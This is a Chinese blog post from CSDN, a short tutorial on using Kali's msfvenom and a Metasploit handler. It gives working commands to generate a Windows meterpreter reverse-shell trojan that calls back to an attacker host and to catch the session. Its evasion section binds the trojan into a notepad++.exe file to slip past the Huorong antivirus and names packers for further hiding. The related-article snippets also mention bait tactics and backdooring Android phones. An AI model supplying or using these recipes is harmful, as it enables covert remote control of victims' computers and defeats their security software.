Kali工具之msfvenom初体验

最新推荐文章于 2024-05-04 21:14:43 发布
最新推荐文章于 2024-05-04 21:14:43 发布
阅读量305 收藏 2
点赞数 9
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60778231/article/details/136228837
版权

介绍

msfvenom是kali中生成远控木马的工具,在本地监听中上线,在目标机上执行后门

使用流程

1.在shell中直接进入msfvenom面板即可

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=9999 -f exe -o attack.exe

msfvenom -p 系统/架构/作用/方式 payload设置 -f 格式 -o 输出文件名
-p payload
-f format
-o output

2.通常在使用msfvenom时,要配合metasploit的handler模块进行监听

1.使用handler模块

use exploit/multi/handler

2.查看handler模块必选项

show options

3.设置handler模块必选项

通常需要设置三个必选项

set payload windows/x64/meterpreter/reverse_tcp 
set lhost=xxx.xxx.xxx.xxx
set lport=x

4.运行handler模块

run

免杀思路

1.捆绑木马(绕过火绒)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=x -f exe -x notepad++.exe -o notepad++.exe

注意,要捆绑的应用程序必须与目标机操作系统的位数一样,即保持为64位即可(国内软件一般为32位,国外一般为64位)

2.加壳
常见加壳软件:穿山甲、Themida等等

_BEYOND
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
weixin_43287317的博客
03-28 6024
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
kali工具集部分翻译.zip
03-10
kali工具集部分翻译.zip 包含了kali Linux工具的部分翻译
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5033
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
kali linux菜单中各工具功能
n534077的博客
03-11 1109
名称 类型 使用模式 功能 功能评价 dmitry 信息收集 whois查询/子域名收集/端口扫描 whois并不简单明了;子域名和邮箱依赖google;端口扫描速度一般 dnmap 信息收集 用于组建分布式nmap,dnmap_server为服务端;dnmap_client为客户端 用起来并不是那么方便,不是实在不行不是很必要 ike-scan 信息收集 收集ipsec vpn se...
网络安全Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux
最新发布
2401_84281629的博客
05-04 726
(6) 查看Kali Linux (2022.4)系统IP地址(7)查看Ubuntu 8.04 系统版本及IP地址。
kali下的wesng初体验
m0_62399876的博客
08-10 1583
本人纯web小白,最近在学习提权,用到了wesng,收获了不少,记录一下。WES-NG是一个基于Windows实用程序输出的工具,它提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何攻击。支持Windows XP和Windows 11之间的每个Windows操作系统,包括其Windows Server对应操作系统。.........
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
jennycisp的博客
12-26 1971
apt-get update报错关于kali2019.4的更新源 (任意选择其中一组就可用,我选的清华源)#清华大学#阿里云#中科大#浙大最后最后,上面安装的虚拟机在 apt-get update 之后的 apt-get upgrade报错,原因找了很久,发现可能是因为kali版本和VMware版本相差太远以至于update的包安装覆盖之类的问题导致报错。-----然后我重新下载了iso镜像,kali2021.4版本。结果upgrade还是有问题,甚至还upgrade之后莫名其妙连不上网络。
Kali工具之Metasploit初体验
qq_60778231的博客
02-22 303
介绍kali中常用的渗透工具Metasploit的简单使用
渗透工具——kali中msf(后门生成模块msfvenom
2301_78006725的博客
09-02 666
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
kali制作绕过火绒检测的木马(仅通过MSF的方式)
qq_50854662的博客
02-14 3165
kali制作绕过火绒检测的木马(仅通过MSF的方式)
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 1万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
kali工具使用.pdf
09-14
kali工具使用.pdf
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常...
kali工具列表.pdf
06-28
kali工具列表.pdf
kali工具说明文档
11-03
此文档仅仅是介绍
kali菜单中各工具功能
weixin_34138056的博客
04-08 3727
一、说明 各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机还是比较耗内存的,内存不够可以试试pentestbox,从功能上可以理解为运行在windows上的kali发行版,kali主流工具它都具备。...
[Kali]--Msfvenom
wwxxee
11-06 898
Msfvenom 参数 MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.ex
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 5845
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
kalimsfvenom
07-27
kalimsfvenom是一个Metasploit的独立后门生成器,也是msfpayload和msfencode的替代品。它可以用来生成各种类型的后门,包括Windows平台上的meterpreter反向TCP连接后门。使用msfvenom可以通过指定参数来生成特定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值